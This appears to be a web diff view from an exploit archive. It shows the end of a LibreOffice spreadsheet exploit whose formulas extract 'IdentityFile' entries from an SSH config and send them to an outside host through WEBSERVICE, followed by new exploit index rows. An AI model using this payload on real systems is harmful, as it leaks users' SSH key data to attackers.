<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="float" office:value="8" calcext:value-type="float">
|
||||
<text:p>8</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p></text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F13])" office:value-type="float" office:value="1408" calcext:value-type="float">
|
||||
<text:p>1408</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=[.F13]+LEN("IdentityFile ")" office:value-type="float" office:value="1383" calcext:value-type="float">
|
||||
<text:p>1383</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F12];1))" office:value-type="float" office:value="1370" calcext:value-type="float">
|
||||
<text:p>1370</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="2"/>
|
||||
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C13]))" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
<table:table-row table:style-name="ro1">
|
||||
<table:table-cell/>
|
||||
<table:table-cell office:value-type="float" office:value="9" calcext:value-type="float">
|
||||
<text:p>9</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])" office:value-type="string" office:string-value="" calcext:value-type="string">
|
||||
<text:p></text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F14])" office:value-type="float" office:value="0" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=[.F14]+LEN("IdentityFile ")" office:value-type="float" office:value="0" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F13];1))" office:value-type="float" office:value="0" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
<table:table-cell table:number-columns-repeated="2"/>
|
||||
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C14]))" office:value-type="string" office:string-value="" calcext:value-type="error">
|
||||
<text:p>#VALUE!</text:p>
|
||||
</table:table-cell>
|
||||
</table:table-row>
|
||||
</table:table>
|
||||
<table:named-expressions/>
|
||||
</office:spreadsheet>
|
||||
</office:body>
|
||||
</office:document>
|
||||
```
|
|
@ -9321,6 +9321,9 @@ id,file,description,date,author,type,platform,port
|
|||
43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
|
||||
43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
|
||||
44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,
|
||||
44023,exploits/linux/local/44023.rb,"Juju-run Agent - Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
|
||||
44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
|
||||
44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
|
||||
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
|
||||
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
|
||||
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
|
||||
|
@ -16009,6 +16012,7 @@ id,file,description,date,author,type,platform,port
|
|||
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
|
||||
44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
|
||||
44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple,
|
||||
44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
|
||||
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
|
||||
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
|
||||
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
|
||||
|
@ -38025,6 +38029,9 @@ id,file,description,date,author,type,platform,port
|
|||
44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php,
|
||||
44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php,
|
||||
44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php,
|
||||
44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java,
|
||||
44020,exploits/java/webapps/44020.txt,"LogicalDOC Enterprise 7.7.4 - User Enumeration",2018-02-12,LiquidWorm,webapps,java,
|
||||
44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java,
|
||||
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
|
||||
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
|
||||
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue